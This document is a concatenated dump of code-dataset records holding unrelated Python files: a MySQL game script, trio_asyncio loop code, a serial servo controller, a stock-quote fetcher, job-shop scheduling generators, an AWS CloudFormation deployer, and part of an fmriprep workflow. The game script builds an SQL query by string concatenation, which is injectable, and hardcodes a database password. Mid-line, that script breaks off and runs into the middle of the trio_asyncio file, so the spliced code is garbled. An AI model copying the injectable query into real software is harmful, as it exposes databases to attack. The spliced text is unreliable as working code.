"django.contrib.messages.INFO", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.shortcuts.redirect", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 39, "usage_type": "call"}, {"api_name": "main.models.Task", "line_number": 39, "usage_type": "argument"}, {"api_name": "main.forms.TaskForm", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.messages.add_message", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 45, "usage_type": "name"}, {"api_name": "django.contrib.messages.SUCCESS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.shortcuts.redirect", "line_number": 46, "usage_type": "call"}, {"api_name": "main.models.CheatSheet.objects.all", "line_number": 48, "usage_type": "call"}, {"api_name": "main.models.CheatSheet.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "main.models.CheatSheet", "line_number": 48, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 49, "usage_type": "call"}, {"api_name": "main.settings.SCREEN_KEYBOARDS", "line_number": 53, "usage_type": "attribute"}, {"api_name": "main.settings", "line_number": 53, "usage_type": "name"}]} {"seq_id": "373240034", "text": "import os\r\nimport time\r\nimport datetime\r\nimport mysql.connector\r\n####################### Is dead check script ###################\r\n\r\n##Define Variables\r\ngame=open(\"game\",\"r\").read()\r\nusername=open(\"username\",\"r\").read()\r\nfaction=open(\"faction\",\"r\").read()\r\nip=open(\"ip.txt\",\"r\").read().rstrip('\\n')\r\n\r\n################################################################\r\ntry:\r\n cnx = mysql.connector.connect(user='default', password='P@sSWORD',\r\n host=ip,\r\n database=game)\r\nexcept:\r\n \r\n raw_input(\"ERROR: Connection Failed\")\r\n quit()\r\ndef isdead(username):\r\n curdate=datetime.datetime.today().strftime(\"%m%d%Y\")\r\n cursor=cnx.cursor()\r\n print(\"Checking if user is considered dead...\")\r\n isdead_read=(\"SELECT * FROM deadlist where username='\"+str(username)+\"'\")\r\n cursor.execute(isdead_read)\r\n x=0\r\n for Data in cursor:\r\n x=x+1\r\n if Data[1]==curdate:\r\n print(Data[0]+\" was pronounced dead at \"+Data[1]+\" for the reason \"+Data[2]+\"\\n\")\r\n deaddate=Data[1]\r\n #print(deaddate)\r\n #print(curdate)\r\n if x==1 or x>1:\r\n if int(deaddate) handler\n\n def attach_loop(self, loop):\n self._loop = loop\n\n async def _waitpid(self, pid, callback, *args):\n returncode = await wait_for_child(pid)\n callback(pid, returncode, *args)\n\n def add_child_handler(self, pid, callback, *args):\n \"\"\"Add a callback to run when a child process terminates.\"\"\"\n h = self._loop.run_trio(self._waitpid, pid, callback, *args)\n self._callbacks[pid] = h\n\n def remove_child_handler(self, pid):\n \"\"\"Remove the callback to run when a child process terminates.\"\"\"\n h = self._callbacks.pop(pid, None)\n if h is None:\n return False\n h.cancel()\n return True\n\n def close(self):\n for pid in list(self._callbacks):\n h = self._callbacks.pop(pid, None)\n if h is None:\n continue\n h.cancel()\n self._loop = None\n\n def __enter__(self):\n return self\n\n def __exit__(self, *tb):\n self.close()\n\n\nasync def run_asyncio(proc, *args):\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop):\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n return await loop.run_asyncio(proc, *args)\n\n\nasync def run_coroutine(fut, scope=None):\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop):\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n return await loop.run_coroutine(fut, scope=scope)\n\n\ndef run_trio(proc, *args):\n \"\"\"Call an asynchronous Trio function from asyncio.\n\n Returns a Future with the result / exception.\n\n Cancelling the future will cancel the Trio task running your\n function, or prevent it from starting if that is still possible.\n\n You need to handle errors yourself.\n \"\"\"\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop): # pragma: no cover\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n return loop.run_trio(proc, *args)\n\n\ndef run_trio_task(proc, *args):\n \"\"\"Call an asynchronous Trio function from sync context.\n\n This method queues the task and returns immediately.\n It does not return a value.\n\n An uncaught error will propagate to, and terminate, the trio-asyncio loop.\n \"\"\"\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop):\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n loop.run_trio_task(proc, *args)\n\n\ndef run(proc, *args, queue_len=None):\n \"\"\"Like :func:`trio.run`, but adds a context that supports asyncio.\n \"\"\"\n\n async def _run_task(proc, args):\n async with open_loop(queue_len=queue_len):\n return await proc(*args)\n\n trio.run(_run_task, proc, args)\n\n\nasyncio.set_event_loop_policy(TrioPolicy())\n", "sub_path": "trio_asyncio/loop.py", "file_name": "loop.py", "file_ext": "py", "file_size_in_byte": 7229, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "asyncio.events", "line_number": 33, "usage_type": "attribute"}, {"api_name": "async_.TrioEventLoop", "line_number": 34, "usage_type": "name"}, {"api_name": "trio.hazmat.RunLocal", "line_number": 38, "usage_type": "call"}, {"api_name": "trio.hazmat", "line_number": 38, "usage_type": "attribute"}, {"api_name": "trio.hazmat.current_task", "line_number": 42, "usage_type": "call"}, {"api_name": "trio.hazmat", "line_number": 42, "usage_type": "attribute"}, {"api_name": "sys.modules", "line_number": 44, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 45, "usage_type": "call"}, {"api_name": "sync.SyncTrioEventLoop", "line_number": 51, "usage_type": "call"}, {"api_name": "trio.hazmat.current_task", "line_number": 72, "usage_type": "call"}, {"api_name": "trio.hazmat", "line_number": 72, "usage_type": "attribute"}, {"api_name": "trio.hazmat.current_task", "line_number": 92, "usage_type": "call"}, {"api_name": "trio.hazmat", "line_number": 92, "usage_type": "attribute"}, {"api_name": "asyncio.DefaultEventLoopPolicy", "line_number": 105, "usage_type": "attribute"}, {"api_name": "asyncio.events", "line_number": 107, "usage_type": "attribute"}, {"api_name": "threading.current_thread", "line_number": 110, "usage_type": "call"}, {"api_name": "threading._MainThread", "line_number": 110, "usage_type": "attribute"}, {"api_name": "threading.current_thread", "line_number": 114, "usage_type": "call"}, {"api_name": "threading._MainThread", "line_number": 114, "usage_type": "attribute"}, {"api_name": "child.wait_for_child", "line_number": 141, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 173, "usage_type": "call"}, {"api_name": "async_.TrioEventLoop", "line_number": 174, "usage_type": "argument"}, {"api_name": "asyncio.get_event_loop", "line_number": 180, "usage_type": "call"}, {"api_name": "async_.TrioEventLoop", "line_number": 181, "usage_type": "argument"}, {"api_name": "asyncio.get_event_loop", "line_number": 196, "usage_type": "call"}, {"api_name": "async_.TrioEventLoop", "line_number": 197, "usage_type": "argument"}, {"api_name": "asyncio.get_event_loop", "line_number": 210, "usage_type": "call"}, {"api_name": "async_.TrioEventLoop", "line_number": 211, "usage_type": "argument"}, {"api_name": "async_.open_loop", "line_number": 221, "usage_type": "call"}, {"api_name": "trio.run", "line_number": 224, "usage_type": "call"}, {"api_name": "asyncio.set_event_loop_policy", "line_number": 227, "usage_type": "call"}]} {"seq_id": "633495836", "text": "import serial, time\nimport sys\nimport glob\n\n\ndef serial_ports():\n \"\"\" Lists serial port names\n\n :raises EnvironmentError:\n On unsupported or unknown platforms\n :returns:\n A list of the serial ports available on the system\n \"\"\"\n if sys.platform.startswith('win'):\n ports = ['COM%s' % (i + 1) for i in range(256)]\n elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n # this excludes your current terminal \"/dev/tty\"\n ports = glob.glob('/dev/tty[A-Za-z]*')\n elif sys.platform.startswith('darwin'):\n ports = glob.glob('/dev/tty.*')\n else:\n raise EnvironmentError('Unsupported platform')\n\n result = []\n for port in ports:\n try:\n s = serial.Serial(port)\n s.close()\n result.append(port)\n except (OSError, serial.SerialException):\n pass\n return result\n\n\ndef setup_ser():\n ser = serial.Serial()\n ser.port = \"COM11\"\n ser.baudrate = 57600\n\n\n ser.open()\n\n if ser.isOpen():\n ser.flushInput() #flush input buffer, discarding all its contents\n ser.flushOutput()#flush output buffer, aborting current output\n #and discard all that is in buffer\n\n cmd_l = ['1','c','2','c','3','c','4','c','5','c','6','c' ]\n cmd_l2 = ['1', 'o', '2', 'o', '3', 'o', '4', 'o', '5', 'o', '6', 'o']\n\n while True:\n cmd = input(\"Enter command or 'ex':\")\n if cmd == 'ex':\n ser.close()\n return\n else:\n if cmd == '1':\n for c in cmd_l:\n ser.write(c.encode())\n time.sleep(.06)\n else:\n for c in cmd_l2:\n ser.write(c.encode())\n time.sleep(.06)\n\n else:\n print(\"cannot open serial port \")\n\n\nif __name__ == '__main__':\n print(serial_ports())\n setup_ser()\n\n\n\n\n\n\n\n\n\n", "sub_path": "xl320_control/xl_320_control_python/xl320_multiple_sercontrol.py", "file_name": "xl320_multiple_sercontrol.py", "file_ext": "py", "file_size_in_byte": 1999, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "sys.platform.startswith", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.platform.startswith", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 16, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.platform.startswith", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 19, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 20, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 27, "usage_type": "call"}, {"api_name": "serial.SerialException", "line_number": 30, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 36, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 64, "usage_type": "call"}]} {"seq_id": "482506536", "text": "\"\"\"\nStackShipper\n\nStackShipper receives details about a templates location in s3\nand uses cloudformation api to deploy the stack\n\"\"\"\n\nfrom botocore.exceptions import ClientError\nfrom cloudwedge.models import AWSService\nfrom cloudwedge.utils.logger import get_logger\n\nLOGGER = get_logger('StackShipper')\n\n# Holder for boto3 client\nCLIENT_FORMATION = None\n\nclass StackShipper():\n def __init__(self, session, s3_bucket: str, s3_key: str, stack_name: str, stack_type: str,\n stack_owner: str):\n # Place the inputs on self\n self.session = session\n self.bucket = s3_bucket\n self.template_key = s3_key\n self.stack_name = stack_name\n self.stack_type = stack_type\n self.stack_owner = stack_owner\n\n def ship(self):\n \"\"\"Receive template and deploy\"\"\"\n\n global CLIENT_FORMATION\n\n if not CLIENT_FORMATION:\n CLIENT_FORMATION = self.session.client('cloudformation')\n\n LOGGER.info(\n f\"StackShipper: bucket={self.bucket} key={self.template_key} stack={self.stack_name}\")\n\n try:\n # Try to run update stack first\n self._post_stack('update_stack')\n LOGGER.info(f'Updated Stack: {self.stack_name}')\n\n except ClientError as err:\n # 1) No updates, we can be done\n if 'No updates are to be performed' in err.response['Error']['Message']:\n LOGGER.info(f'No updates are to to be performed.')\n\n # 2) Stack doesnt exit, run create\n elif 'does not exist' in err.response['Error']['Message']:\n\n # If it failed on update because it doesnt exist, create instead\n try:\n self._post_stack('create_stack')\n LOGGER.info(f'Created Stack: {self.stack_name}')\n except ClientError as err:\n LOGGER.error(f'Failed to create Stack: {err}')\n raise err\n\n # 3) Stack in progress, allow it to finish\n elif any(x in err.response['Error']['Message'] for x in ['UPDATE_IN_PROGRESS', 'CREATE_IN_PROGRESS']):\n # If it failed on update its already being updated, lets take our chance the update in progress is good\n # When an RDS tag is edited, it deletes the tag first which fires an event. Then it updates, another event :)\n LOGGER.info(\n f'Stack update is in progress, allowing that stack to proceed. Aborting error free.')\n\n # 4) Something else, the sky is falling\n else:\n LOGGER.error(f'Failed to deploy cloudformation: {err}')\n raise err\n\n except Exception as err:\n LOGGER.error(f'Failed to deploy cloudformation: {err}')\n raise err\n\n def _post_stack(self, api_name: str):\n \"\"\"Create a stack for the Alarms\"\"\"\n\n LOGGER.info(f\"Running {api_name} for {self.stack_name}\")\n\n try:\n # Get api method from cloudformation boto3 client and run it\n getattr(CLIENT_FORMATION, api_name)(\n StackName=self.stack_name,\n TemplateURL=f\"https://s3.amazonaws.com/{self.bucket}/{self.template_key}\",\n Capabilities=[\n \"CAPABILITY_IAM\",\n ],\n Tags=[\n {\n 'Key': AWSService.TAG_STACK_ID_KEY,\n 'Value': AWSService.TAG_STACK_ID_VALUE\n },\n {\n 'Key': AWSService.TAG_OWNER,\n 'Value': self.stack_owner\n },\n {\n 'Key': AWSService.TAG_STACK_TYPE_KEY,\n 'Value': self.stack_type\n }\n ]\n )\n\n except Exception as err:\n raise err\n", "sub_path": "app/src/deploy_stack/stack_shipper.py", "file_name": "stack_shipper.py", "file_ext": "py", "file_size_in_byte": 3892, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "cloudwedge.utils.logger.get_logger", "line_number": 12, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 44, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 56, "usage_type": "name"}, {"api_name": "cloudwedge.models.AWSService.TAG_STACK_ID_KEY", "line_number": 91, "usage_type": "attribute"}, {"api_name": "cloudwedge.models.AWSService", "line_number": 91, "usage_type": "name"}, {"api_name": "cloudwedge.models.AWSService.TAG_STACK_ID_VALUE", "line_number": 92, "usage_type": "attribute"}, {"api_name": "cloudwedge.models.AWSService", "line_number": 92, "usage_type": "name"}, {"api_name": "cloudwedge.models.AWSService.TAG_OWNER", "line_number": 95, "usage_type": "attribute"}, {"api_name": "cloudwedge.models.AWSService", "line_number": 95, "usage_type": "name"}, {"api_name": "cloudwedge.models.AWSService.TAG_STACK_TYPE_KEY", "line_number": 99, "usage_type": "attribute"}, {"api_name": "cloudwedge.models.AWSService", "line_number": 99, "usage_type": "name"}]} {"seq_id": "603070253", "text": "import sys\nimport tushare as ts\n\nargv = sys.argv[1:]\n\ntry:\n code = argv[0]\nexcept Exception as e:\n print('Code is required');\n exit(1)\n\ndf = ts.get_realtime_quotes(code)\n\nprint(df.to_json(orient='records'))", "sub_path": "python/get_realtime_quotes.py", "file_name": "get_realtime_quotes.py", "file_ext": "py", "file_size_in_byte": 215, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sys.argv", "line_number": 4, "usage_type": "attribute"}, {"api_name": "tushare.get_realtime_quotes", "line_number": 12, "usage_type": "call"}]} {"seq_id": "617775784", "text": "import numpy as np\nimport copy\nfrom collections import OrderedDict as OrderedDict\n# from collections import OrderedDict\n\n# NOTE: ALL THE INDEX IN THE PROGRAM STARTING FROM 0, I.E., OUTPUT ID IS FROM 0\n\n# THE DEFINITION OF NEIGHBOURHOOD OF A NODE IS THE SET OF ITS PRECEDENT NODE, ADJUNCTION AND DISJUNCTION GRAPH\n\n\nclass InstanceGenerator:\n\n def __init__(self, file_path, number_of_jobs, number_of_machines):\n \"\"\"\n :param file_path: data file path\n :param number_of_jobs: the number of jobs for this type of problem\n :param number_of_machines: the number of machines for this type of problem\n \"\"\"\n self.file_path = file_path\n self.number_of_jobs = number_of_jobs\n self.number_of_machines = number_of_machines\n # generate problem instances dic\n self.instances_stat_dict = self._read_in_data()\n\n def _read_in_data(self):\n \"\"\"\n :return: dict of all instances read from data file, of the format:\n {\n \"instances_i\": {'Times': n_jobs * n_machines list\n 'Machines': n_jobs * n_machines list\n 'Nb of Jobs': int\n 'Nb of Machines': int\n 'Time seed': int\n 'Machine seed': int\n 'Upper bound': int\n 'Lower bound': int},\n i = 1, 2, 3, ...\n \"Problems\": 'n_jobs' + '_' + 'n_machines'\n }\n it is a dictionary of a dictionary\n query: what is instance_1's Lower bound?\n run code: self.instances_stat_dict[\"instance_1\"][\"Lower bound\"]\n The data matrix (Times & Machines) is stored as list, can be easily changed to numpy array\n \"\"\"\n\n # initialize the list\n tags_list = []\n tags_value_list = []\n duration_list = []\n machine_list = []\n\n # open the data file\n file_reading_obj = open(self.file_path)\n # list of all lines in the file\n lines = file_reading_obj.readlines()\n\n # save data...\n for i in range(len(lines)):\n\n if \"seed\" in lines[i]:\n # saving tags ( Getting rid of the '\\n' using 'rstrip()' )\n # rstrip() means right strip, and strip() removes char from right end and left end\n tags_list.append([str(tag).rstrip() for tag in lines[i].split(\", \")])\n\n # saving tag's value\n tags_value_list.append([int(tag_value) for tag_value in lines[i+1].split()])\n\n if \"Times\" in lines[i]:\n temp_times = []\n for j in range(self.number_of_jobs):\n temp_times.append([int(duration) for duration in lines[i+j+1].split()])\n duration_list.append(temp_times)\n\n if \"Machines\\n\" == lines[i]:\n temp_machines = []\n for j in range(self.number_of_jobs):\n temp_machines.append([int(machine) for machine in lines[i+j+1].split()])\n machine_list.append(temp_machines)\n\n # generate the instances dictionary...\n instances_stat_dict = dict()\n for i in range(len(tags_list)):\n instances_stat_dict[\"instance_\"+str(i+1)] = {\n \"Times\": duration_list[i],\n \"Machines\": machine_list[i],\n }\n for j in range(len(tags_list[0])):\n instances_stat_dict[\"instance_\"+str(i+1)][tags_list[i][j]] = tags_value_list[i][j]\n\n instances_stat_dict[\"Problem\"] = str(self.number_of_jobs) + \"_\" + str(self.number_of_machines)\n\n # close the file\n file_reading_obj.close()\n\n return instances_stat_dict\n\n def generate_noisy_version_for_given_instance(self, instance_name, std):\n \"\"\"\n :param instance_name: the instance name like 'instance_1'; the problem class is already specified in the\n argument 'n_jobs' and 'n_machines'; to see it, just print out 'Belonging':\n print(add_gaussian_noise_for_given_instance(instance_name, std)['belonging'])\n :param std: std of gaussian noise\n :return: a gaussian noised instance\n {'Times': n_jobs * n_machines list\n 'Machines': n_jobs * n_machines list\n 'Nb of Jobs': int\n 'Nb of Machines': int\n 'Time seed': int\n 'Machine seed': int\n 'Upper bound': 'Unknown'\n 'Lower bound': 'Unknown'\n 'Times_mean': n_jobs * n_machines list\n 'Belonging': str for which instance does this generated noisy one belong to\n 'Std': standard deviation for gaussian}\n TO BE NOTED:\n AFTER ADDING GAUSSIAN NOISE, A NEW INSTANCE IS GENERATED, SO ITS UPPER BOUND IS UNKNOWN\n \"\"\"\n\n instance_copy = copy.deepcopy(self.instances_stat_dict[instance_name])\n\n for i in range(len(instance_copy[\"Times\"][0])):\n for j in range(len(instance_copy[\"Times\"][1])):\n instance_copy[\"Times\"][i][j] = round(np.random.normal(instance_copy[\"Times\"][i][j], std))\n if instance_copy[\"Times\"][i][j] < 0:\n instance_copy[\"Times\"][i][j] = 0\n\n instance_copy[\"Upper bound\"] = \"Unknown\"\n instance_copy[\"Lower bound\"] = \"Unknown\"\n instance_copy[\"Belonging\"] = str(self.number_of_jobs) + \"_\" + str(self.number_of_machines) + \":\" + instance_name\n instance_copy[\"Times_mean\"] = self.instances_stat_dict[instance_name]['Times']\n instance_copy[\"Std\"] = std\n\n return instance_copy\n\n\nclass GraphGenerator:\n \"\"\"\n This class generate a graph based on the given instance of a problem\n This class is only used for generating graph representation of a problem instance, the transit process\n will be specified in the StochasticJSSP gym env, not here.\n\n A node in the graph will be represented as a list vector, specifying its attributes\n node = [task_id, mean_duration, machine_id, neighbours_list], where the neighbour of a node are nodes ids of\n its precedent nodes in adjunctive and disjunctive graphs.\n \"\"\"\n def __init__(self, instance):\n \"\"\"\n :param instance: gaussian noised instance\n \"\"\"\n self.instance = instance\n # generate the graph\n self.graph = self._generate_graph()\n\n def _generate_graph(self):\n \"\"\"\n :return: graph representation of an instance with value \"Times_mean\"\n {'[0, 1]': {'Machine_id': [int],\n 'Mean duration': [int],\n 'Std': [int],\n 'Neighbourhood':[[], [], ...]\n }, ...}\n \"\"\"\n\n graph = []\n meanduration_matrix = self.instance[\"Times_mean\"]\n duration_matrix = self.instance[\"Times\"]\n machine_matrix = self.instance['Machines']\n\n # initialize machine cliques. The machine cliques hold ids of tasks that need to be scheduled on machines.\n machine_cliques = [[i] for i in range(self.instance['Nb of Machines'])]\n # generate machine cliques\n for i in range(len(machine_matrix)):\n for j in range(len(machine_matrix[0])):\n machine_cliques[machine_matrix[i][j]-1].append([i, j])\n # delete position ele 'i' ...\n for i in range(len(machine_cliques)):\n machine_cliques[i].pop(0)\n\n # print(machine_cliques)\n\n # generate node info list\n for i in range(len(meanduration_matrix)): # row loop\n for j in range(len(meanduration_matrix[0])): # column loop\n # add task id, mean duration, machine id, and neighbours of disjunctive graph\n node_i_j = {\n 'Node_id': [i, j],\n 'Machine_id': [machine_matrix[i][j] - 1],\n 'Mean duration': [meanduration_matrix[i][j]],\n 'duration': [duration_matrix[i][j]],\n 'Std': [self.instance['Std']],\n 'Neighbourhood': machine_cliques[machine_matrix[i][j]-1],\n }\n deepNode_cp = copy.deepcopy(node_i_j)\n # delete index of itself from its neighbourhood\n deepNode_cp['Neighbourhood'].pop(node_i_j['Neighbourhood'].index(node_i_j['Node_id']))\n # add neighbour node of conjunctive graph,\n # if it is the first task, then its conjunctive neighbour is '[-1, -1]'\n deepNode_cp['Neighbourhood'].append([i, j-1] if j != 0 else [-1, -1])\n graph.append(deepNode_cp)\n '''\n # this code changes:\n # graph = [{\n 'Node_id': [0, 1],\n 'Machine_id': int,\n 'Mean duration': int,\n 'Std': int,\n 'Neighbourhood':[[], [], ...]\n }...]\n # to:\n # ret = {'[0, 1]': {'Machine_id': int,\n 'Mean duration': int,\n 'Std': int,\n 'Neighbourhood':[[], [], ...]\n }, ...}\n '''\n ret = dict({str(graph[i]['Node_id']): {j: copy.deepcopy(graph[i][j]) for j in graph[i] if j != 'Node_id'}\n for i in range(len(graph))})\n # print(ret)\n\n return ret\n\n def __get__(self, instance, owner, index):\n return self.graph[index]\n\n\ndef to_dict(ordered_dict):\n dic = dict(ordered_dict)\n for item in dic:\n dic[item] = dict(ordered_dict[item])\n return dic\n\n\ndef to_ordered_dict(dic):\n for node in dic:\n dic[node] = OrderedDict(dic[node])\n return OrderedDict(dic)\n\n\ndef to_numpy(graph_dict):\n \"\"\"\n :param graph_dict:\n :return: convert dict list attribute to numpy type\n \"\"\"\n '''\n try:\n cp = copy.deepcopy(graph_dict)\n for node in cp:\n for item in node:\n np.asarray(node[item])\n except TypeError:\n print(\"Please give graph dict to convert\")\n '''\n cp = dict()\n for node in graph_dict:\n cp[node] = dict()\n for item in graph_dict[node]:\n cp[node][item] = np.asarray(graph_dict[node][item])\n return cp\n\n\ndef get_index(neighbour):\n \"\"\"\n :param neighbour: nparray [job_id, task_id, disjunctive_indicator, conjunctive_indicator]\n :return: string '[job_id, task_id]'\n \"\"\"\n return str(neighbour[:2].tolist())\n\n\ndef override(fn):\n \"\"\"\n override decorator\n \"\"\"\n return fn\n\n\ndef index_helper(location, env):\n \"\"\"\n :param location: [i, j]\n :param env:\n :return: int index of given task [i, j]\n \"\"\"\n return location[0]*env.number_of_machines + location[1]\n\n\ndef get_neighbour_index(node, env):\n # node = '[i, j]'\n nei_idx_list = []\n for nei in env.state[node]['Neighbourhood']:\n if nei[2] != 0:\n nei_idx_list.append(nei[0:2].tolist())\n return nei_idx_list\n\n\nif __name__ == \"__main__\":\n\n '''\n Instances generator and graph generator test code...\n '''\n\n n_jobs = 15\n n_machines = 15\n f_path = \"../Data/tai\" + str(n_jobs) + \"_\" + str(n_machines) + \".txt\"\n\n # gaussian noise parameter\n std = 5\n\n instances = InstanceGenerator(file_path=f_path, number_of_jobs=n_jobs, number_of_machines=n_machines)\n\n gaussian_noised = instances.generate_noisy_version_for_given_instance(\"instance_1\", std=std)\n\n G = GraphGenerator(gaussian_noised)\n\n print(G.graph)\n to_arr = to_numpy(G.graph)\n", "sub_path": "Env/Env_utils.py", "file_name": "Env_utils.py", "file_ext": "py", "file_size_in_byte": 11458, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "copy.deepcopy", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 123, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 193, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 216, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 235, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 257, "usage_type": "call"}]} {"seq_id": "445099042", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\nApply susceptibility distortion correction (SDC)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n.. topic :: Abbreviations\n\n fmap\n fieldmap\n VSM\n voxel-shift map -- a 3D nifti where displacements are in pixels (not mm)\n DFM\n displacements field map -- a nifti warp file compatible with ANTs (mm)\n\n\"\"\"\nfrom __future__ import print_function, division, absolute_import, unicode_literals\n\nimport pkg_resources as pkgr\n\nfrom nipype.pipeline import engine as pe\nfrom nipype.interfaces import utility as niu\nfrom nipype.interfaces import fsl\nfrom nipype.interfaces.ants import CreateJacobianDeterminantImage\nfrom niworkflows.interfaces.registration import ANTSApplyTransformsRPT, ANTSRegistrationRPT\nfrom niworkflows.interfaces.masks import ComputeEPIMask\n\nfrom fmriprep.interfaces import itk\nfrom fmriprep.interfaces import ReadSidecarJSON\nfrom fmriprep.interfaces.bids import DerivativesDataSink\n\n\ndef init_sdc_unwarp_wf(name='sdc_unwarp_wf', settings=None):\n \"\"\"\n This workflow takes in a displacements fieldmap and calculates the corresponding\n displacements field (in other words, an ANTs-compatible warp file).\n \n It also calculates a new mask for the input dataset that takes into account the distortions.\n The mask is restricted to the field of view of the fieldmap since outside of it corrections could not be performed.\n\n .. workflow ::\n\n from fmriprep.workflows.fieldmap.unwarp import init_sdc_unwarp_wf\n wf = init_sdc_unwarp_wf(settings={'reportlets_dir': '.', 'ants_nthreads': 8})\n\n\n Inputs\n\n in_reference\n the reference image\n in_mask\n a brain mask corresponding to ``in_reference``\n name_source\n path to the original _bold file being unwarped\n fmap\n the fieldmap in Hz\n fmap_ref\n the reference (anatomical) image corresponding to ``fmap``\n fmap_mask\n a brain mask corresponding to ``fmap``\n\n\n Outputs\n\n out_reference\n the ``in_reference`` after unwarping\n out_warp\n the corresponding :abbr:`DFM (displacements field map)` compatible with\n ANTs\n out_jacobian\n the jacobian of the field (for drop-out alleviation)\n out_mask\n mask of the unwarped input file\n out_mask_report\n reportled for the skullstripping\n\n \"\"\"\n\n if settings is None:\n # Don't crash if workflow used outside fmriprep\n settings = {'ants_nthreads': 6}\n\n workflow = pe.Workflow(name=name)\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['in_reference', 'in_mask', 'name_source',\n 'fmap_ref', 'fmap_mask', 'fmap']), name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(\n fields=['out_reference', 'out_warp', 'out_mask',\n 'out_jacobian', 'out_mask_report']), name='outputnode')\n\n meta = pe.Node(ReadSidecarJSON(), name='meta')\n\n explicit_mask_epi = pe.Node(fsl.ApplyMask(), name=\"explicit_mask_epi\")\n\n # Register the reference of the fieldmap to the reference\n # of the target image (the one that shall be corrected)\n ants_settings = pkgr.resource_filename('fmriprep', 'data/fmap-any_registration.json')\n if settings.get('debug', False):\n ants_settings = pkgr.resource_filename(\n 'fmriprep', 'data/fmap-any_registration_testing.json')\n fmap2ref_reg = pe.Node(ANTSRegistrationRPT(generate_report=True,\n from_file=ants_settings, output_inverse_warped_image=True,\n output_warped_image=True, num_threads=settings['ants_nthreads']),\n name='fmap2ref_reg')\n fmap2ref_reg.interface.num_threads = settings['ants_nthreads']\n\n ds_reg = pe.Node(\n DerivativesDataSink(base_directory=settings['reportlets_dir'],\n suffix='fmap_reg'), name='ds_reg')\n\n # Map the VSM into the EPI space\n fmap2ref_apply = pe.Node(ANTSApplyTransformsRPT(\n generate_report=True, dimension=3, interpolation='BSpline', float=True),\n name='fmap2ref_apply')\n\n fmap_mask2ref_apply = pe.Node(ANTSApplyTransformsRPT(\n generate_report=False, dimension=3, interpolation='NearestNeighbor',\n float=True),\n name='fmap_mask2ref_apply')\n\n ds_reg_vsm = pe.Node(\n DerivativesDataSink(base_directory=settings['reportlets_dir'],\n suffix='fmap_reg_vsm'), name='ds_reg_vsm')\n\n # Fieldmap to rads and then to voxels (VSM - voxel shift map)\n torads = pe.Node(niu.Function(function=_hz2rads), name='torads')\n\n gen_vsm = pe.Node(fsl.FUGUE(save_unmasked_shift=True), name='gen_vsm')\n # Convert the VSM into a DFM (displacements field map)\n # or: FUGUE shift to ANTS warping.\n vsm2dfm = pe.Node(itk.FUGUEvsm2ANTSwarp(), name='vsm2dfm')\n jac_dfm = pe.Node(CreateJacobianDeterminantImage(\n imageDimension=3, outputImage='jacobian.nii.gz'), name='jac_dfm')\n\n unwarp_reference = pe.Node(ANTSApplyTransformsRPT(dimension=3,\n generate_report=False,\n float=True,\n interpolation='LanczosWindowedSinc'),\n name='unwarp_reference')\n\n fieldmap_fov_mask = pe.Node(niu.Function(function=_fill_with_ones), name='fieldmap_fov_mask')\n\n fmap_fov2ref_apply = pe.Node(ANTSApplyTransformsRPT(\n generate_report=False, dimension=3, interpolation='NearestNeighbor',\n float=True),\n 